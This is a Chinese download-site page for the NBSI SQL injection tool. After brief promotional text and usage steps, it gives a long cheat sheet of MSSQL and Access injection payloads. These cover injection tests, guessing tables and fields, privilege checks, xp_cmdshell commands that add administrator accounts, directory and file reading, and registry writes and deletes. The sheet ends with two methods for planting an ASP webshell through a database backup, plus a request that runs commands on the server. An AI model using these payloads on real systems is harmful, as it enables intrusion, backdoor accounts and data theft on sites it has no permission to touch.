nbsi檢測工具有著強大的檢測功能,可以幫助用戶更好的對網站進行檢測漏洞,有著快速高效的運轉效率,幫助工作人員極大的提升了使用時間,并且有著準確的檢查結果顯示,有需要的用戶就來極光下載站試試吧!
nbsi(網站安全漏洞檢測工具,又叫sql注入分析器)是一套高集成性web安全檢測系統,是由nb聯盟編寫的一個非常強的sql注入工具。經長時間的更新優化,在asp程序漏洞分析方面已經遠遠超越于同類產品。nbsi分為個人版和商業版兩種,個人版只能檢測出一般網站的漏洞,而商業版則沒有完全限制,且其分析范圍和準確率都所有提升。
1.專業程度很高,能夠非常完美的為你檢測到漏洞并消滅它
2.軟件體積小巧,運行起來速度快并且幾乎不占用什么系統內存
3.兼容性非常的強大,可以支持電腦系統或者是網站上的漏洞選擇
1.下載文件找到“nbsi.exe”雙擊運行,進入軟件
2.系統設置包括了開始域名、域名的總數、日志等
3.cms識別包括了配置、導入域名、導入、當前識別、識別的結果、cms程序等
4.漏洞掃描包括了導入域名、域名總數、通用的cms漏洞、通用組件漏洞等
5.目錄掃描包括了域名,導入、指紋識別、急速掃描、精確掃描等
1.判斷是否有注入
;and 1=1
;and 1=2
2.初步判斷是否是mssql
;and user>0
3.判斷數據庫系統
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access
4.注入參數是字符
'and [查詢條件] and ''='
5.搜索時沒過濾參數的
'and [查詢條件] and '%25'='
6.猜數據庫
;and (select count(*) from [數據庫名])>0
7.猜字段
;and (select count(字段名) from 數據庫名)>0
8.猜字段中記錄長度
;and (select top 1 len(字段名) from 數據庫名)>0
9.(1)猜字段的ascii值(access)
;and (select top 1 asc(mid(字段名,1,1)) from 數據庫名)>0
(2)猜字段的ascii值(mssql)
;and (select top 1 unicode(substring(字段名,1,1)) from 數據庫名)>0
10.測試權限結構(mssql)
;and 1=(select is_srvrolemember('sysadmin'));--
;and 1=(select is_srvrolemember('serveradmin'));--
;and 1=(select is_srvrolemember('setupadmin'));--
;and 1=(select is_srvrolemember('securityadmin'));--
;and 1=(select is_srvrolemember('diskadmin'));--
;and 1=(select is_srvrolemember('bulkadmin'));--
;and 1=(select is_member('db_owner'));--
11.添加mssql和系統的帳戶
;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null,
username,password;--
;exec master.dbo.sp_addsrvrolemember sysadmin
username;--
;exec master.dbo.xp_cmdshell 'net user username
password /workstations:* /times:all
/passwordchg:yes /passwordreq:yes /active:yes /add'
;--
;exec master.dbo.xp_cmdshell 'net user username
password /add';--
;exec master.dbo.xp_cmdshell 'net localgroup
administrators username /add';--
12.(1)遍歷目錄
;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree 'c:'
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not
in('上步得到的paths'))>)
(2)遍歷目錄
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- 獲得當前所有驅動器
;insert into temp(id) exec master.dbo.xp_subdirs 'c:';-- 獲得子目錄列表
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:';-- 獲得所有子目錄的目錄樹結構
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:webindex.asp';-- 查看文件的內容
13.mssql中的存儲過程
xp_regenumvalues 注冊表根鍵, 子鍵
;exec xp_regenumvalues 'hkey_local_machine',
'softwaremicrosoftwindowscurrentversionrun' 以多個記錄集方式返回所有鍵值
xp_regread 根鍵,子鍵,鍵值名
;exec xp_regread 'hkey_local_machine',
'softwaremicrosoftwindowscurrentversion',
'commonfilesdir' 返回制定鍵的值
xp_regwrite 根鍵,子鍵, 值名, 值類型, 值
值類型有2種reg_sz 表示字符型,reg_dword 表示整型
;exec xp_regwrite 'hkey_local_machine',
'softwaremicrosoftwindowscurrentversion',
'testvaluename','reg_sz','hello' 寫入注冊表
xp_regdeletevalue 根鍵,子鍵,值名
exec xp_regdeletevalue 'hkey_local_machine',
'softwaremicrosoftwindowscurrentversion',
'testvaluename' 刪除某個值
xp_regdeletekey 'hkey_local_machine',
'softwaremicrosoftwindowscurrentversiontestkey' 刪除鍵,包括該鍵下所有值
14.mssql的backup創建webshell
use model
create table cmd(str image);
insert into cmd(str) values ('<% dim oscript %>');
backup database model to disk='c:l.asp';
15.mssql內置函數
;and (select @@version)>0 獲得windows的版本號
;and user_name()='dbo' 判斷當前系統的連接用戶是不是sa
;and (select user_name())>0 爆當前系統的連接用戶
;and (select db_name())>0 得到當前連接的數據庫
16.簡潔的webshell
use model
create table cmd(str image);
insert into cmd(str) values ('<%=server.createobject(&wscript.shell&).exec(&cmd.exe /c &&request(&c&)).stdout.readall%>');
backup database model to disk='g:wwwtestl.asp';
請求的時候,像這樣子用:
http://ip/l.asp?c=dir
nbsi3.0
修復http發包api錯誤問題
優化字典,刪了10萬無用字典
顯示狀態可是設置提示那些狀態碼或者不提示那些狀態碼
解壓密碼:www.mianpu1000.com
網友評論